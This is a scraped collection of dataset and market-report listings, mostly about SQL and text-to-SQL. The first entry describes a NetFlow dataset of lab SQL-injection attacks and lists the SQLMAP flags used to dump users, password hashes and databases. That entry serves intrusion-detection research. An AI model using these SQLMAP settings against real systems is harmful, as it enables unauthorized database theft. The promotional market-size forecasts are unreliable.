Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Introduction
This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used.
NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.
Datasets
The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2).
The datasets contain both benign and malicious traffic. All collected datasets are balanced.
The version of NetFlow used to build the datasets is 5.
Dataset
Aim
Samples
Benign-malicious
traffic ratio
D1
Training
400,003
50%
D2
Test
57,239
50%
Infrastructure and implementation
Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.
DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes)
Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet).
The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.
The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table.
Parameters
Description
'--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema'
Enumerate users, password hashes, privileges, roles, databases, tables and columns
--level=5
Increase the probability of a false positive identification
--risk=3
Increase the probability of extracting data
--random-agent
Select the User-Agent randomly
--batch
Never ask for user input, use the default behavior
--answers="follow=Y"
Predefined answers to yes
Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer).
The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.
However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes.
To run the MySQL server we ran MariaDB version 10.4.12. Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.
Facebook
TwitterApache License, v2.0https://www.apache.org/licenses/LICENSE-2.0
License information was derived automatically
Image generated by DALL-E. See prompt for more details
synthetic_text_to_sql
gretelai/synthetic_text_to_sql is a rich dataset of high quality synthetic Text-to-SQL samples, designed and generated using Gretel Navigator, and released under Apache 2.0. Please see our release blogpost for more details. The dataset includes:
105,851 records partitioned into 100,000 train and 5,851 test records ~23M total tokens, including ~12M SQL tokens Coverage across 100 distinct… See the full description on the dataset page: https://huggingface.co/datasets/gretelai/synthetic_text_to_sql.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Blockchain data query: dune-sql-generate-large-series-sample
Facebook
Twitterhttp://www.apache.org/licenses/LICENSE-2.0http://www.apache.org/licenses/LICENSE-2.0
This dataset contains 56,964 conversations between een AI assistant and a (fake) "Human" (generated) in Dutch, specifically in the domain of programming (Stack Overflow). They are translations of Baize's machine-generated answers to the Stack Overflow dataset.
Data Instances
{'id': 9, 'input': 'Het gesprek tussen de mens en de AI-assistent. ' '[|Human|] Ik heb wat hulp nodig met Spark SQL union en het ordenen ' 'van kolommen. ' '[|AI|] Natuurlijk, ik help je graag. Waar heb je specifiek hulp ' 'bij nodig? ' '[|Human|] Ik wil de output van een UNION-query ordenen op een ' 'kolom die niet aanwezig is in de SELECT-instructie. Is dat ' 'mogelijk? ' '[|AI|] Ja, het is mogelijk met Spark SQL. Je kunt de ordinale ' 'positie van de kolom in de ORDER BY-clausule gebruiken in plaats ' 'van de kolomnaam. Als je bijvoorbeeld wilt ordenen op de derde ' 'kolom in de SELECT-instructie, kun je ORDER BY 3 gebruiken. ' '[|Human|] Dat is nuttig. Kan ik ook een alias gebruiken in de ' 'ORDER BY-clausule? ' '[|AI|] Ja, je kunt een alias gebruiken in de ORDER BY-clausule. De ' 'alias moet worden gedefinieerd in de SELECT-instructie. Als je ' 'bijvoorbeeld de derde kolom als "col3" alias geeft, kun je ordenen ' 'met ORDER BY col3. ' '[|Human|] Oké, ik denk dat ik het begrijp. Kan ik dezelfde alias ' 'gebruiken voor kolommen uit beide tabellen in de UNION? ' '[|AI|] Nee, je kunt dezelfde alias niet gebruiken voor kolommen ' 'uit beide tabellen in de UNION. Elke tabel in de UNION moet een ' 'unieke alias hebben voor de kolommen. ' '[|Human|] ', 'topic': 'Spark SQL UNION - ORDER BY kolom niet in SELECT'},
Data Fields
id: the ID of the item. The following 82 IDs are not included because they could not be translated: [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992]
input: the machine-generated conversation between AI and "Human". Always starts with Het gesprek tussen de mens en de AI-assistent. and has at least one occurrence of both [|AI|] and [|Human|].
topic: the topic description
Dataset Creation
Both the translations and the topics were translated with OpenAI's API for gpt-3.5-turbo. max_tokens=1024, temperature=0 as parameters.
The prompt template to translate the input is (where src_lang was English and tgt_lang Dutch):
CONVERSATION_TRANSLATION_PROMPT = """You are asked to translate a conversation between an AI assistant and a human from {src_lang} into {tgt_lang}.
Here are the requirements that you should adhere to:
1. maintain the format: the conversation consists of the AI (marked as [|AI|]) and the human ([|Human|]) talking in turns and responding to each other;
2. do not translate the speaker identifiers [|AI|] and [|Human|] but always copy them into the translation in appropriate places;
3. ensure accurate translation and keep the correctness of the conversation;
4. make sure that text is fluent to read and does not contain grammatical errors. Use standard {tgt_lang} without regional bias;
5. translate the human's text using informal, but standard, language;
6. make sure to avoid biases (such as gender bias, grammatical bias, social bias);
7. if the human asks to correct grammar mistakes or spelling mistakes then you have to generate a similar mistake in {tgt_lang}, and then also generate a corrected output version for the AI in {tgt_lang};
8. if the human asks to translate text from one to another language, then you only translate the human's question to {tgt_lang} but you keep the translation that the AI provides in the language that the human requested;
9. do not translate code fragments but copy them as they are. If there are English examples, variable names or definitions in code fragments, keep them in English.
Now translate the following conversation with the requirements set out above. Do not provide an explanation and do not add anything else.
"""
The prompt to translate the topic is:
TOPIC_TRANSLATION_PROMPT = "Translate the following title of a conversation from {src_lang} to {tgt_lang} in a succinct,"
" summarizing manner. Translate accurately and formally. Do not provide any explanation"
" about the translation and do not include the original title.
"
The system message was:
You are a helpful assistant that translates English to Dutch to the requirements that are given to you.
Note that 82 items (0.1%) were not successfully translated. The translation was missing the AI identifier [|AI|] and/or the human one [|Human|]. The IDs for the missing items are [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992].
The translation quality has not been verified. Use at your own risk!
Licensing Information
Licensing info for Stack Overflow Questions is listed as Apache 2.0. If you use the current dataset, you should also adhere to the original license.
This text was generated (either in part or in full) with GPT-3 (gpt-3.5-turbo), OpenAI’s large-scale language-generation model. Upon generating draft language, the author reviewed, edited, and revised the language to their own liking and takes ultimate responsibility for the content of this publication.
If you use this dataset, you must also follow the Sharing and Usage policies.
As clearly stated in their Terms of Use, specifically 2c.iii, "[you may not] use output from the Services to develop models that compete with OpenAI". That means that you cannot use this dataset to build models that are intended to commercially compete with OpenAI. As far as I am aware, that is a specific restriction that should serve as an addendum to the current license.
This dataset is also available on the Hugging Face hub with the same DOI and license. See that README for more info.
Facebook
Twitterhttps://choosealicense.com/licenses/other/https://choosealicense.com/licenses/other/
view code : https://colab.research.google.com/drive/1rLk-mdsWsdxwQdYYJS24rAP9KABtbiqu?usp=sharing
Example :
{"messages": [
{"role": "system", "content": "You are a SQL expert assistant. Generate clear, efficient SQL queries based on user requests. Provide only the SQL query without any additional text or explanation."}
{"role": "user", "content": "What are the top 5 most popular genres of music in the database, based on the number of tracks… See the full description on the dataset page: https://huggingface.co/datasets/fknguedia/SQL-GENERATOR-DATASETS.
Facebook
TwitterAttribution-NonCommercial-ShareAlike 4.0 (CC BY-NC-SA 4.0)https://creativecommons.org/licenses/by-nc-sa/4.0/
License information was derived automatically
This data contains Create database, Use, create table (int, varchar, date), describe, alter table (add, modify, char, varchar, after, rename column, to, drop column, drop), show tables, Rename table (to), Drop table.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Overview
This dataset builds from WikiSQL and Spider. There are 78,577 examples of natural language queries, SQL CREATE TABLE statements, and SQL Query answering the question using the CREATE statement as context. This dataset was built with text-to-sql LLMs in mind, intending to prevent hallucination of column and table names often seen when trained on text-to-sql datasets. The CREATE TABLE statement can often be copy and pasted from different DBMS and provides table names, column… See the full description on the dataset page: https://huggingface.co/datasets/b-mc2/sql-create-context.
Facebook
Twitterhttps://dataintelo.com/privacy-and-policyhttps://dataintelo.com/privacy-and-policy
According to our latest research, the global SQL Generation AI market size reached USD 1.42 billion in 2024, reflecting a robust expansion driven by the rapid adoption of artificial intelligence technologies in database management and analytics. The market is set to grow at a compelling CAGR of 27.6% from 2025 to 2033, with the total market size forecasted to reach USD 13.18 billion by 2033. This remarkable growth trajectory is primarily fueled by advancements in natural language processing, the increasing complexity of enterprise data environments, and the demand for automation in SQL query generation to enhance productivity and reduce operational costs.
The primary growth factors propelling the SQL Generation AI market revolve around the escalating need for data-driven decision-making and the democratization of data access across organizations. As enterprises generate and store vast amounts of data, the ability to quickly and accurately extract actionable insights becomes critical. SQL Generation AI solutions, leveraging advanced machine learning and natural language processing algorithms, enable non-technical users to generate complex SQL queries using simple natural language instructions. This not only reduces the dependency on specialized database administrators but also accelerates the pace of business intelligence and analytics initiatives. The proliferation of self-service analytics and the integration of AI-powered query generation into popular business intelligence platforms further amplify market growth, making it easier for organizations to unlock the value of their data assets.
Another significant driver is the ongoing digital transformation across various industries, which has led to the modernization of legacy IT infrastructures and the adoption of cloud-based data management solutions. Organizations are increasingly migrating their databases to the cloud to benefit from scalability, flexibility, and cost-efficiency. SQL Generation AI tools are being integrated with cloud data warehouses and analytics platforms, allowing for seamless query generation and real-time data analysis. This shift not only optimizes data workflows but also supports hybrid and multi-cloud strategies, enabling enterprises to manage and analyze data across diverse environments. The rising volume and diversity of data, coupled with the need for real-time insights, are compelling organizations to invest in AI-powered SQL generation to maintain a competitive edge.
Additionally, the COVID-19 pandemic has accelerated the adoption of digital technologies, including AI-driven SQL generation, as organizations seek to automate routine tasks and enhance operational resilience. The growing emphasis on remote work and distributed teams has highlighted the importance of intuitive data access and collaboration tools. SQL Generation AI solutions facilitate seamless collaboration between business users and data teams, bridging the gap between technical and non-technical stakeholders. This has led to increased demand across sectors such as BFSI, healthcare, retail, and manufacturing, where timely data insights are crucial for strategic decision-making. The market is also witnessing heightened interest from small and medium enterprises, which are leveraging AI-powered SQL generation to level the playing field with larger competitors.
Regionally, North America continues to dominate the SQL Generation AI market, accounting for the largest share in 2024, followed by Europe and Asia Pacific. The presence of major technology vendors, early adoption of AI and cloud technologies, and a strong focus on data-driven innovation contribute to North America's leadership position. Europe is witnessing rapid growth, driven by stringent data regulations and increasing investments in digital transformation initiatives. Meanwhile, Asia Pacific is emerging as a high-growth region, fueled by expanding IT infrastructure, a burgeoning startup ecosystem, and rising demand for advanced analytics solutions in countries such as China, India, and Japan. Latin America and the Middle East & Africa are also showing promising growth potential as organizations in these regions accelerate their digital journeys.
The SQL Generation AI market by component is broadly segmented into Software and Services. The software segment commands the majority market share, as organizations increasingly dep
Facebook
TwitterApache License, v2.0https://www.apache.org/licenses/LICENSE-2.0
License information was derived automatically
https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2Fdd8e395e5d70bde9279f0f653b4bc2bf%2FGemini_Generated_Image_cvz71ncvz71ncvz7.jpg?generation=1736783649344014&alt=media" alt="">
This project involves analyzing and transforming data from a bike warehouse database using SQL. The goal is to clean, transform, and query the data to generate insights about products, employees, customers, sales, and trends.
The SAP Bikes Sales database contains various tables that represent business data for a bike warehouse, such as information on products, sales, employees, business partners, and more. This project focuses on cleaning and transforming data, optimizing database schema, and generating SQL queries to gain business insights.
1.**Data Cleaning & Transformation**: - Remove duplicate records from key tables. - Drop unnecessary columns and handle null values. - Populate new columns based on existing data. - Merge related tables to create new insights. 2.**Business Insights Queries**: - Top-selling Products: Identify products with the highest sales quantities and total revenue. - Sales Performance by Product Category: Analyze revenue and order counts by product category. - Employee Sales Performance: Track employees' contribution to sales volumes and revenue. - Customer Segmentation: Examine the number of orders placed by business partners and their total sales value. - Sales Trends: Analyze sales trends over time and calculate average order values.
-**Addresses Table**:
-Checking for duplicates ADDRESSID.
-**BusinessPartners Table**:
-Handled duplicates, missing or incorrect data.
-Dropped the unnecessary FAXNUMBER column because it was empty.
-**Employee Table**:
-Dropped unnecessary columns.
-Populated NAME_INITIALS based on employee's first, middle, and last name initials.
-Fixed column type issues.
-**Product Categories and Product Texts**:
-Merged ProductCategories and ProductCategoryText tables into a new CombinedProductCategories table for easy analysis.
-**Products Table**:
-Dropped irrelevant columns such as WIDTH, DEPTH, HEIGHT, etc.
-**Sales Order Items Table**:
-Fixed null values in GROSSAMOUNT and created a TOTALGROSSAMOUNT column to track sales volume.
###2. Database Diagram and Relationships In addition to the data cleaning and analysis, a database diagram has been create...
Facebook
Twitterhttps://creativecommons.org/publicdomain/zero/1.0/https://creativecommons.org/publicdomain/zero/1.0/
By Huggingface Hub [source]
A large crowd-sourced dataset for developing natural language interfaces for relational databases. WikiSQL is a dataset of 80654 hand-annotated examples of questions and SQL queries distributed across 24241 tables from Wikipedia.
For more datasets, click here.
- 🚨 Your notebook can be here! 🚨!
This dataset can be used to develop natural language interfaces for relational databases. The data fields are the same among all splits, and the file contains information on the phase, question, table, and SQL for each interface
- This dataset can be used to develop natural language interfaces for relational databases.
- This dataset can be used to develop a knowledge base of common SQL queries.
- This dataset can be used to generate a training set for a neural network that translates natural language into SQL queries
If you use this dataset in your research, please credit the original authors.
License
License: CC0 1.0 Universal (CC0 1.0) - Public Domain Dedication No Copyright - You can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission. See Other Information.
File: validation.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |
File: train.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |
File: test.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |
If you use this dataset in your research, please credit the original authors. If you use this dataset in your research, please credit Huggingface Hub.
Facebook
TwitterAttribution-ShareAlike 3.0 (CC BY-SA 3.0)https://creativecommons.org/licenses/by-sa/3.0/
License information was derived automatically
sql-create-context-v2 Dataset
Overview
The sql-create-context-v2 dataset enhances the original dataset built from WikiSQL and Spider, focusing on text-to-SQL tasks with a special emphasis on reducing hallucination of column and table names. This version introduces a JSONL format for more efficient data processing and iteration, alongside a structured approach to representing SQL queries in the dataset entries.
Key Enhancements
Dataset Format: Transitioned to… See the full description on the dataset page: https://huggingface.co/datasets/ramachetan22/sql-create-context-v2.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Replication package for the paper:
Ludovic Courtès, Timothy Sample, Simon Tournier, Stefano Zacchiroli.Source Code Archiving to the Rescue of Reproducible DeploymentACM REP'24, June 18-20, 2024, Rennes, Francehttps://doi.org/10.1145/3641525.3663622
Generating the paper
The paper can be generated using the following command:
guix time-machine -C channels.scm
-- shell -C -m manifest.scm
-- make
This uses GNU Guix to run make in the exact same computational environment used when preparing the paper. The computational environment is described by two files. The channels.scm file specifies the exact version of the Guix package collection to use. The manifest.scm file selects a subset of those packages to include in the environment.
It may be possible to generate the paper without Guix. To do so, you will need the following software (on top of a Unix-like environment):
GNU Make
SQLite 3
GNU AWK
Rubber
Graphviz
TeXLive
Structure
data/ contains the data examined in the paper
scripts/ contains dedicated code for the paper
logs/ contains logs generated during certain computations
Preservation of Guix
Some of the claims in the paper come from analyzing the Preservation of Guix (PoG) database as published on January 26, 2024. This database is the result of years of monitoring the extent to which the source code referenced by Guix packages is archived. This monitoring has been carried out by Timothy Sample who occasionally publishes reports on his personal website: https://ngyro.com/pog-reports/latest/. The database included in this package (data/pog.sql) was downloaded from https://ngyro.com/pog-reports/2024-01-26/pog.db and then exported to SQL format. In addition to the SQL file, the database schema is also included in this package as data/schema.sql.
The database itself is largely the result of scripts, but also of manual adjustments (where necessary or convenient). The scripts are available at https://git.ngyro.com/preservation-of-guix/, which is preserved in the Software Heritage archive as well: https://archive.softwareheritage.org/swh:1:snp:efba3456a4aff0bc25b271e128aa8340ae2bc816;origin=https://git.ngyro.com/preservation-of-guix. These scripts rely on the availability of source code in certain locations on the Internet, and therefore will not yield exactly the same result when run again.
Analysis
Here is an overview of how we use the PoG database in the paper. The exact way it is queried to produce graphs and tables for the paper is laid out in the Makefile.
The pog-types.sql query gives the counts of each source type (e.g. “git” or “tar-gz”) for each commit covered by the database.
The pog-status.sql query gives the archival status of the sources by commit. For each commit, it produces a count of how many sources are stored in the Software Heritage archive, missing from it, or unknown if stored or missing. The pog-status-total.sql query does the same thing but over all sources without sorting them into individual commits.
The disarchive-ratio.sql query estimates the success rate of Disarchive disassembly.
Finally, the swhid-ratio.sql query gives the proportion of sources for which the PoG database has an SWHID.
Estimating missing sources
The Preservation of Guix database only covers sources from a sample of commits to the Guix repository. This greatly simplifies the process of collecting the sources at the risk of missing a few. We estimate how many are missed by searching Guix’s Git history for Nix-style base-32 hashes. The result of this search is compared to the hashes in the PoG database.
A naïve search of Git history results in an over estimate due to Guix’s branch development model. We find hashes that were never exposed to users of ‘guix pull’. To work around this, we also approximate the history of commits available to ‘guix pull’. We do this by scraping push events from the guix-commits mailing list archives (data/guix-commits.mbox). Unfortunately, those archives are not quite complete. Missing history is reconstructed in the data/missing-links.txt file.
This estimate requires a copy of the Guix Git repository (not included in this package). The repository can be obtained from GNU at https://git.savannah.gnu.org/git/guix.git or from the Software Heritage archive: https://archive.softwareheritage.org/swh:1:snp:9d7b8dcf5625c17e42d51357848baa226b70e4bb;origin=https://git.savannah.gnu.org/git/guix.git. Once obtained, its location must be specified in the Makefile.
To generate the estimate, use:
guix time-machine -C channels.scm
-- shell -C -m manifest.scm
-- make data/missing-sources.txt
If not using Guix, you will need additional software beyond what is used to generate the paper:
GNU Guile
GNU Bash
GNU Mailutils
GNU Parallel
Measuring link rot
In order to measure link rot, we ran Guix Scheme scripts, i.e., scripts that exploit Guix as a Scheme library. The scripts depend on the state of world at the very specific moment when they ran. Hence, it is not possible to reproduce the exact same outputs. However, their tendency over the passing of time should be very similar. For running them, you need an installation of Guix. For instance,
guix repl -q scripts/table-per-origin.scm
When running these scripts for the paper, we tracked their output and saved it inside the logs directory.
Facebook
Twitterhttps://www.verifiedmarketresearch.com/privacy-policy/https://www.verifiedmarketresearch.com/privacy-policy/
SQL In-Memory Database Market size was valued at USD 9.26 Billion in 2024 and is projected to reach USD 35.7 Billion by 2032, growing at a CAGR of 20.27% from 2026 to 2032.
SQL In-Memory Database Market Drivers
Demand for Real-Time Analytics and Processing: Businesses increasingly require real-time insights from their data to make faster and more informed decisions. SQL In-Memory databases excel at processing data much faster than traditional disk-based databases, enabling real-time analytics and operational dashboards.
Growth of Big Data and IoT Applications: The rise of Big Data and the Internet of Things (IoT) generates massive amounts of data that needs to be processed quickly. SQL In-Memory databases can handle these high-velocity data streams efficiently due to their in-memory architecture.
Improved Performance for Transaction Processing Systems (TPS): In-memory databases offer significantly faster query processing times compared to traditional databases. This translates to improved performance for transaction-intensive applications like online banking, e-commerce platforms, and stock trading systems.
Reduced Hardware Costs (in some cases): While implementing an in-memory database might require an initial investment in additional RAM, it can potentially reduce reliance on expensive high-performance storage solutions in specific scenarios.
Focus on User Experience and Application Responsiveness: In today's digital landscape, fast and responsive applications are crucial. SQL In-Memory databases contribute to a smoother user experience by enabling quicker data retrieval and transaction processing.
However, it's important to consider some factors that might influence market dynamics:
Limited Data Capacity: In-memory databases are typically limited by the amount of available RAM, making them less suitable for storing massive datasets compared to traditional disk-based solutions.
Higher Implementation Costs: Setting up and maintaining an in-memory database can be more expensive due to the additional RAM requirements compared to traditional databases.
Hybrid Solutions: Many organizations opt for hybrid database solutions that combine in-memory and disk-based storage, leveraging the strengths of both for different data sets and applications.
Facebook
Twitter
According to our latest research, the global SQL-Verified Generation market size reached USD 2.18 billion in 2024, driven by the increasing demand for data integrity, compliance, and advanced analytics across industries. The market is expected to grow at a robust CAGR of 13.5% from 2025 to 2033, reaching a projected value of USD 6.47 billion by 2033. This growth is primarily attributed to the surge in data-driven decision-making, the proliferation of digital transformation initiatives, and the rising regulatory requirements for data validation and security worldwide. As organizations continue to prioritize accurate, reliable, and compliant data operations, the adoption of SQL-Verified Generation solutions is set to accelerate steadily over the forecast period.
One of the primary growth factors propelling the SQL-Verified Generation market is the exponential increase in data volumes generated by enterprises across various sectors. As organizations collect and process vast amounts of structured and unstructured data, the need for robust SQL-based verification tools becomes critical to ensure data accuracy, consistency, and reliability. These solutions enable businesses to automate data validation processes, minimize human errors, and enhance the overall quality of business intelligence outputs. Furthermore, the integration of artificial intelligence and machine learning with SQL-Verified Generation platforms is enabling advanced analytics and real-time data validation, further amplifying market growth. The ongoing digital transformation across industries such as BFSI, healthcare, and retail is pushing organizations to invest in scalable and secure data management solutions, thereby fueling the demand for SQL-Verified Generation systems.
Another significant driver for market expansion is the stringent regulatory landscape governing data privacy, security, and compliance. With regulations such as GDPR, HIPAA, and CCPA becoming more rigorous, organizations are under increasing pressure to ensure that their data processing and storage practices are fully compliant. SQL-Verified Generation solutions play a vital role in automating compliance checks, auditing data flows, and providing transparent reporting mechanisms. These capabilities not only help organizations avoid hefty fines and reputational damage but also build trust with stakeholders and customers. The growing emphasis on data governance and risk management is prompting enterprises to adopt advanced SQL-Verified Generation tools that offer comprehensive compliance and auditing functionalities, thereby contributing to sustained market growth.
Technological advancements and the shift towards cloud-based infrastructures are also catalyzing the adoption of SQL-Verified Generation solutions. Cloud deployment offers unparalleled scalability, flexibility, and cost-effectiveness, making it an attractive option for organizations of all sizes. The increasing integration of SQL-Verified Generation tools with cloud-based platforms and enterprise resource planning (ERP) systems is streamlining data integration, validation, and reporting processes. This seamless integration is not only enhancing operational efficiency but also enabling organizations to leverage real-time insights for strategic decision-making. As cloud adoption continues to rise, especially among small and medium enterprises, the market for SQL-Verified Generation solutions is poised for significant expansion in the coming years.
From a regional perspective, North America and Europe are currently leading the SQL-Verified Generation market, driven by the presence of major technology providers, high digital adoption rates, and strict regulatory frameworks. However, the Asia Pacific region is emerging as a lucrative market, fueled by rapid digitalization, increasing investments in IT infrastructure, and a growing focus on data-driven business strategies. Countries such as China, India, and Japan are witnessing substantial growth in sectors like BFSI, healthcare, and e-commerce, which is boosting the demand for advanced data validation and compliance solutions. As organizations in emerging economies continue to embrace digital transformation, the SQL-Verified Generation market is expected to witness robust growth across all major regions.
Facebook
Twitterhttps://dataintelo.com/privacy-and-policyhttps://dataintelo.com/privacy-and-policy
According to our latest research, the global in-vehicle SQL query engine market size reached USD 1.29 billion in 2024, with a robust year-on-year growth trajectory. The market is projected to expand at a CAGR of 14.7% from 2025 to 2033, reaching an estimated USD 4.14 billion by 2033. This impressive growth is primarily driven by the automotive sector’s increasing adoption of real-time data management and analytics solutions, which are critical for modern connected vehicles and advanced driver-assistance systems. As per our latest research, the demand for in-vehicle SQL query engines is being propelled by the integration of advanced infotainment, safety, and telematics features that require seamless, high-speed data querying capabilities within vehicle architectures.
One of the most significant growth factors for the in-vehicle SQL query engine market is the rapid digital transformation within the automotive industry. The proliferation of connected vehicles has led to an exponential increase in the volume and complexity of data generated by onboard sensors, infotainment units, and telematics systems. Automakers and OEMs are increasingly leveraging SQL query engines to process and analyze this data in real time, enabling enhanced vehicle performance, predictive maintenance, and personalized user experiences. The shift towards software-defined vehicles and the rising implementation of edge computing within vehicles further underscore the necessity for robust, scalable, and efficient SQL query engines that can handle diverse data streams and deliver actionable insights with minimal latency.
Another key driver is the growing emphasis on safety, security, and regulatory compliance across global automotive markets. Advanced driver-assistance systems (ADAS), telematics, and fleet management platforms rely heavily on accurate and timely data retrieval to ensure optimal operation and compliance with evolving safety standards. SQL query engines provide the backbone for these mission-critical applications by facilitating complex queries and aggregating data from multiple subsystems in real time. Furthermore, as vehicles become increasingly autonomous and connected, the need for secure, reliable, and high-performance data management solutions is intensifying, pushing automotive stakeholders to invest in advanced in-vehicle SQL query engine technologies.
The expanding ecosystem of electric vehicles (EVs) and the rise of mobility-as-a-service (MaaS) platforms are also catalyzing the growth of the in-vehicle SQL query engine market. EVs, with their sophisticated battery management systems and connected infrastructure, generate vast amounts of operational and diagnostic data that require efficient querying and analysis. Similarly, fleet operators and mobility service providers are adopting SQL query engines to optimize route planning, monitor vehicle health, and enhance customer satisfaction. These evolving market dynamics are expected to drive sustained demand for in-vehicle SQL query engines across both passenger and commercial vehicle segments, fostering innovation and competition among technology vendors.
From a regional perspective, Asia Pacific is emerging as a dominant force in the in-vehicle SQL query engine market, fueled by the rapid adoption of connected vehicle technologies in China, Japan, and South Korea. North America and Europe continue to be significant markets, driven by early technological adoption, stringent safety regulations, and the presence of leading automotive OEMs. The Middle East & Africa and Latin America are also witnessing steady growth, supported by increasing investments in smart mobility and telematics infrastructure. The regional outlook remains highly promising, with each geography contributing uniquely to the global expansion of the in-vehicle SQL query engine market.
The component segment of the in-vehicle SQL query engine market is broadly categorized into software, hardware, and services. The software sub-segment holds the largest market share, driven by the rising demand for advanced query processing, analytics, and data management solutions within vehicle ecosystems. Automotive software platforms are evolving to support complex SQL queries that enable real-time data aggregation, event detection, and predictive analytics. Vendors are focusing on developing lig
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Overview
This dataset builds from sql-create-context. @misc{b-mc2_2023_sql-create-context, title = {sql-create-context Dataset}, author = {b-mc2}, year = {2023}, url = {https://huggingface.co/datasets/b-mc2/sql-create-context}, note = {This dataset was created by modifying data from the following sources: \cite{zhongSeq2SQL2017, yu2018spider}.}, }
Facebook
TwitterCC0 1.0 Universal Public Domain Dedicationhttps://creativecommons.org/publicdomain/zero/1.0/
License information was derived automatically
analyze the current population survey (cps) annual social and economic supplement (asec) with r the annual march cps-asec has been supplying the statistics for the census bureau's report on income, poverty, and health insurance coverage since 1948. wow. the us census bureau and the bureau of labor statistics ( bls) tag-team on this one. until the american community survey (acs) hit the scene in the early aughts (2000s), the current population survey had the largest sample size of all the annual general demographic data sets outside of the decennial census - about two hundred thousand respondents. this provides enough sample to conduct state- and a few large metro area-level analyses. your sample size will vanish if you start investigating subgroups b y state - consider pooling multiple years. county-level is a no-no. despite the american community survey's larger size, the cps-asec contains many more variables related to employment, sources of income, and insurance - and can be trended back to harry truman's presidency. aside from questions specifically asked about an annual experience (like income), many of the questions in this march data set should be t reated as point-in-time statistics. cps-asec generalizes to the united states non-institutional, non-active duty military population. the national bureau of economic research (nber) provides sas, spss, and stata importation scripts to create a rectangular file (rectangular data means only person-level records; household- and family-level information gets attached to each person). to import these files into r, the parse.SAScii function uses nber's sas code to determine how to import the fixed-width file, then RSQLite to put everything into a schnazzy database. you can try reading through the nber march 2012 sas importation code yourself, but it's a bit of a proc freak show. this new github repository contains three scripts: 2005-2012 asec - download all microdata.R down load the fixed-width file containing household, family, and person records import by separating this file into three tables, then merge 'em together at the person-level download the fixed-width file containing the person-level replicate weights merge the rectangular person-level file with 